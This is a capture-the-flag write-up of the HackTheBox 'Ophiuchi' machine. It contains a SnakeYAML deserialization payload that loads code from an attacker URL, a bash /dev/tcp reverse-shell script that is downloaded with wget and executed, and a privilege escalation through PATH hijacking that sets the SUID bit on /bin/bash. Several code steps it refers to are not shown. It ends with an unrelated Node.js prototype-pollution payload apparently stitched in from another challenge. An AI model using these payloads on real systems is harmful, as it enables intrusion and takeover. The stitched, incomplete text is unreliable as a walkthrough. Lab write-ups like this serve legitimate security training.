7.8 KiB
HackTheBox-Ophiuchi
Rustscan
rustscan -a 10.10.10.227 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
Open 10.10.10.227:22
Open 10.10.10.227:8080
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.38
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Parse YAML
PORT 8080 (HTTP)
There's a YAML parser so I tried to write something there but got no response
From the nmap scan we already know that Apache Tomcat 9.0.38 is running ,so I logging in by going to /manager
,but wasn't able to login using the default credentials
So after googling for apache tomcat 9.0.38 vulnerabilites/exploits I found snake yaml deserilization exploit
The exploit is about Snake YAML having a feature to call a java class constructor
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://VPN_IP/"]
]]
]
We'll see a request being made for
/METAINF/services/javax.script.ScriptEngineFactory
on our machine
We can abuse it in a way that keeping the same file structure like having directory 'META-IN' then a sub directory services
having a file name javax.script.ScriptEngineFactory
and in that file we will call our exploit
Create a file name exploit.java
you can get the java code from here and in that we'll try to ping our local machine to see if the exploit works or not so that we can get a reverse shell
https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java
Compile the java file using javac
and you will get .class file
In the javax.script.ScriptEngineFactory
we will include this content
And also we will make a folder snakeyml
having that exlpoit.class
file
So the file structure will look like this , so start the python3 server or apache2 to host the folder and use the same java class constructor we were calling yaml
After sending it we receive a 500 error
We can see the error that we compiled the java file with the latest version of javac
so we need to comiple it using the java class 55 version. We can do this by specifying the release as a paramter in javac. (Thank you stackoverflow)
Now compiling it using the release version 11 and start both the python3 web server and start listening for ICMP packets on tun0 interface
On giving java constructor class in yaml we will see the ICMP packets
But there was a problem in getting a reverse shell no matter which reverse shell I tried to use whether it was a bash or netcat I couldn't get a shell so I made a script which had a bash reverse shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.196/4242 0>&1
Now we will download the bash script on the target machine using wget
save it in /tmp
directory and will execute it using bash also we will setup a netcat listener. So modifying our exploit.java
file
Enter this in yaml parser input box
Once you enter this on your terminal you'll see the request being made to get exploit.sh
and you will get a reverse shell
Stabilizing the shell using python3
Since apache tomcat is running we can now search for users file
Now using find command to search for that file
We can try to switch user as admin
with that password on the machine
Reading the source code we can see that it's going to read the Web assembly binary then it's going to get a value from info
function and if that value it's not equal to 1 the program will give the ouput "Not ready to deploy" else it would execute a deploy.sh
script.
There is one thing to note that main.wasm
and deploy.sh
don't have the absolute path in the source meaning we can make our own files and then play around with the PATH variable. So first I am going to download main.wasm
on to my machine
https://github.com/WebAssembly/wabt
And here will be using a tool named WABT
Web Assembly Binary Toolkit , we need to convert the main.wasm file to .wat file as it is a text format to that binary. But before that first let's see the info
function in the binary using wasm-decompile which will decompile the binary to C syntax
We can see that info
function returns the value 0 so that's what we need to change. Converting .wasm to .wat file
On opening the .wat file we can see that const
value is 0
So remeber the source code had a condition if f!=1
(if f is not equal to 1) it's going to print not deploy else it will execute the deploy.sh
script so change that 0 to 1
Now we need that back in binary form (.wasm) so we are going to convert it from .wat to .wasm
Transfer this onto target machine in /tmp
directory also to make a deploy.sh
file. I added a command to make bash a SUID in that script file
Now to add /tmp
to PATH variable and run the golang source code as sudo
We can see that /bin/bash
now has a SUID bit on this means we can get root by running bash with -p
You can also get a reverse shell using netcat (OpenBSD)
{
"song":
{
"name":"Not Polluting with the boys"
},
"__proto__.block":
{
"type": "Text",
"line": "'test'; return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "ARZ"
}
}